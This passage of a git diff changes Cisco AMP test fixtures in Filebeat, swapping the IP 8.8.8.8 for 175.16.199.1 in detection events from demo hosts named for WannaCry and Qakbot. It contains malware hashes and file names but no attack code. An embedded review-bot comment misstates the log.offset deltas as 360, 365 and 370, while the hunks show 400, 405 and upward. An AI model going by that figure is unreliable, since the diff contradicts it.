"10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -4678,7 +4678,7 @@ "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -4712,7 +4712,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 100372, + "log.offset": 100772, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -4721,7 +4721,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -4733,7 +4733,7 @@ "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -4772,7 +4772,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 101558, + "log.offset": 101963, "process.hash.md5": "ad7b9c14083b52bc532fba5948342b98", "process.hash.sha1": "ee8cbf12d87c4d388f09b4f69bed2e91682920b5", "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", @@ -4786,7 +4786,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -4802,7 +4802,7 @@ "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -4843,7 +4843,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 103091, + "log.offset": 103501, "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "process.name": "tasksche.exe", "process.pid": 2708, @@ -4857,7 +4857,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -4873,7 +4873,7 @@ "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -4911,7 +4911,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 104633, + "log.offset": 105048, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -4920,7 +4920,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -4936,7 +4936,7 @@ "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -4968,7 +4968,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 105894, + "log.offset": 106314, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -4977,7 +4977,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -4989,7 +4989,7 @@ "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -5023,7 +5023,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 107014, + "log.offset": 107439, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -5032,7 +5032,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -5044,7 +5044,7 @@ "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -5078,7 +5078,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 108200, + "log.offset": 108630, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], @@ -5087,7 +5087,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -5099,7 +5099,7 @@ "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -5133,7 +5133,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 109386, + "log.offset": 109821, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], @@ -5142,7 +5142,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -5154,7 +5154,7 @@ "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -5194,7 +5194,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 110571, + "log.offset": 111011, "related.hash": [ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "84c82835a5d21bbcf75a61706d8ab549", @@ -5205,7 +5205,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -5221,7 +5221,7 @@ "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -5261,7 +5261,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 111942, + "log.offset": 112387, "related.hash": [ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "84c82835a5d21bbcf75a61706d8ab549", @@ -5272,7 +5272,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" 
@@ -5288,7 +5288,7 @@ "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -5328,7 +5328,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 113313, + "log.offset": 113763, "related.hash": [ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "84c82835a5d21bbcf75a61706d8ab549", @@ -5339,7 +5339,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -5355,7 +5355,7 @@ "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -5395,7 +5395,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 114684, + "log.offset": 115139, "related.hash": [ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "84c82835a5d21bbcf75a61706d8ab549", @@ -5406,7 +5406,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -5422,7 +5422,7 @@ "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -5462,7 +5462,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 116055, + "log.offset": 116515, "related.hash": [ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "84c82835a5d21bbcf75a61706d8ab549", 
@@ -5473,7 +5473,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -5489,7 +5489,7 @@ "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -5529,7 +5529,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 117426, + "log.offset": 117891, "related.hash": [ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "84c82835a5d21bbcf75a61706d8ab549", @@ -5540,7 +5540,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -5556,7 +5556,7 @@ "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -5596,7 +5596,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 118797, + "log.offset": 119267, "related.hash": [ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "84c82835a5d21bbcf75a61706d8ab549", @@ -5607,7 +5607,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -5623,7 +5623,7 @@ "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -5663,7 +5663,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 120168, + "log.offset": 120643, "related.hash": [ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "84c82835a5d21bbcf75a61706d8ab549", @@ -5674,7 +5674,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -5690,7 +5690,7 @@ "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -5730,7 +5730,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 121539, + "log.offset": 122019, "related.hash": [ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "84c82835a5d21bbcf75a61706d8ab549", @@ -5741,7 +5741,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -5757,7 +5757,7 @@ "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -5797,7 +5797,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 122910, + "log.offset": 123395, "related.hash": [ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "84c82835a5d21bbcf75a61706d8ab549", @@ -5808,7 +5808,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" 
@@ -5824,7 +5824,7 @@ "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -5863,7 +5863,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 124281, + "log.offset": 124771, "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "process.name": "mssecsvc.exe", "process.pid": 6404, @@ -5875,7 +5875,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log index dc134052124e..ecfcf6be070a 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log 
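Review bot: The replacement value `175.16.199.1` on the `related.ip` and `cisco.amp.computer.external_ip` lines is still a globally routable address rather than one of the RFC 5737 TEST-NET blocks (`192.0.2.0/24`, `198.51.100.0/24`, `203.0.113.0/24`), so the fixture keeps the property the change appears to be removing from `8.8.8.8`: a real third party's address appears in a published test corpus and in anything that indexes it. If the address was chosen deliberately, for example so that a geoip enrichment step resolves it in the test database, that rationale is not visible in this diff and deserves a sentence in the module's test notes or the PR description; otherwise `"cisco.amp.computer.external_ip": "203.0.113.1"` would be the conventional pick. The `log.offset` deltas across the neighbouring hunks grow by exactly 5 per record (360, 365, 370, …), matching the length difference between the two literals, which suggests the substitution is purely mechanical and no other fixture field changed. This file section's header and the input `.ndjson.log` that produces these expected records are outside this hunk.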
@@ -1,62 +1,62 @@ -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":96000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":862000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine 
Failure","event_type_id":2164260880,"detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":659000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":831000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":706000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":643000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":721000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":214000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat 
